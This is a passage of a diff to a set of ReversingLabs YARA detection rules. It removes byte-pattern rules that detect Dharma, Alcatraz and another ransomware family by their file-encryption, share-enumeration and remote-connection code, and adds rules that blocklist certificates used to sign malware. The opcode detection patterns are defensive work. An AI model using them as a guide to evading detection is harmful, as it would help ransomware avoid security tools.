-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 4D ?? 51
-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75
-            ?? 32 C0 E9 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B
-            55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15
-        }
-		$encrypt_files_p2 = {
-            85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A
-            ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B
-            95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A
-            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74
-            ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 4D
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 8D ?? ?? ??
-            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51
-            FF 15 ?? ?? ?? ?? B0 ?? 8B E5 5D C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85
-            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 0F B7 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 89 95 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 83 F8 ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            73 ?? 8B 95 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 95 ?? ?? ?? ?? 83 FA ?? 75
-        }
-		$find_files_p2 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 89 85 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 73 ?? 8B 8D ?? ?? ?? ?? 8B 14 8D ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 8D ?? ?? ??
-            ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
-            8B E5 5D C3
-        }
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? FF 15 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 83 F9 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 81 C2 ?? ?? ?? ?? 52 8D 95 ?? ?? ?? ??
-            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D
-            ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ?? ??
-            ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7F ?? 8D 85 ?? ?? ?? ?? 50 8B
-            8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74
-            ?? EB ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 95 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mikael LLC" and ( pe.signatures [ i ] . serial == "00:8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" or pe.signatures [ i ] . serial == "8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" ) and 1613088000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dharma : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_984E84Cfe362E278F558E2C70Aaafac2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Dharma ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8157b20b-717c-581f-83c1-5fc8d2312238"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "180f1209-7031-50fb-b1fc-3d357f2b73a1"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Dharma.yara#L1-L108"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6f33281523b462aaff68bb04f2f6869c3e6cd60cd9306ed80bb0c3e3b699f315"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11744-L11762"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e7a8f3dff77121df53d5f932f861e15208b0607ba77712f40927bc14b17a53cd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Dharma"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$file_search = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 8B 55
-            ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ??
-            75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 8B
-            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B
-            55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D
-            ?? ?? 75 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52
-            8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$file_encrypt_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 4D ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 8B 45 ?? 2B C2 83 E8 ?? 89 45 ?? 8B
-            4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ??
-            ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 05 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ??
-            ?? ?? 8B 4D ?? 83 E1 ?? 74 ?? 8B 55 ?? 83 E2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 89 85 ?? ?? ??
-            ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D
-            ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ??
-            83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51
-            E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D
-            ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B
-            55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83 7D
-            ?? ?? 75 ?? 8B 4D ?? 3B 4D ?? 73 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 B8 ?? ?? ??
-            ?? 2B C2 89 45 ?? 8B 4D ?? 03 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 03 45 ?? 50 8B 4D ?? 51
-        }
-		$file_encrypt_2 = {
-            8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 45 ?? 39 85 ?? ?? ?? ??
-            74 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 95 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ??
-            ?? 83 7D ?? ?? 74 ?? 8B 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50
-            8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89
-            45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45
-            ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 ??
-            6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89
-            45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45
-            ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 05 ?? ??
-            ?? ?? 89 45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0
-            ?? 89 45 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 2B 55 ?? 52 8B 45 ?? 50 8B 8D ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 2B 55 ?? 39 95 ?? ?? ?? ?? 74 ?? EB ??
-            EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? E9 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ??
-            ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ??
-            8B 55 ?? 52 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ??
-            ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$enum_shares = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ??
-            50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 E8 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45
-            ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75
-            ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 8B 55 ??
-            8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ??
-            8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1
-            ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D ?? 51 E8 ?? ?? ?? ?? 83 C4
-            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ??
-            52 E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D
-            4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB
-            ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ??
-            8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1
-            E0 ?? 8B 4D ?? 8B 54 01 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50
-            8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51
-            8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ??
-            8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Arctic Nights \\xC3\\x84k\\xC3\\xA4slompolo Oy" and ( pe.signatures [ i ] . serial == "00:98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" or pe.signatures [ i ] . serial == "98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" ) and 1640304000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "acd29c6d-27ed-587a-b17c-989e69082434"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11764-L11782"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8c80ed4e4f77df34ff9fcc712deda4c1bbedc588f2b01d02aa705e368fb98c5e"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $file_search and $enum_shares and $file_encrypt_1 and $file_encrypt_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK ANNA LIMITED" and ( pe.signatures [ i ] . serial == "00:ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" or pe.signatures [ i ] . serial == "ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" ) and 1647388800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Alcatraz : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_84A4A0D0657E217B176B455E2465Aee0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Alcatraz ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ff37483-ae63-5c82-a355-81ef68e2f663"
-		date = "2020-07-28"
-		modified = "2020-07-28"
+		id = "1484a28d-ce7c-506f-8cbb-73ac541a0907"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Alcatraz.yara#L1-L91"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ddd35c8da0c08bce17cacfba8bb8a8b8a8c08c3e59261a88a79c63b03d29000f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11784-L11802"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "92f6e90bd21182bece68ac1651105f96a18c5b1497d30e0040a978e349341bdb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Alcatraz"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
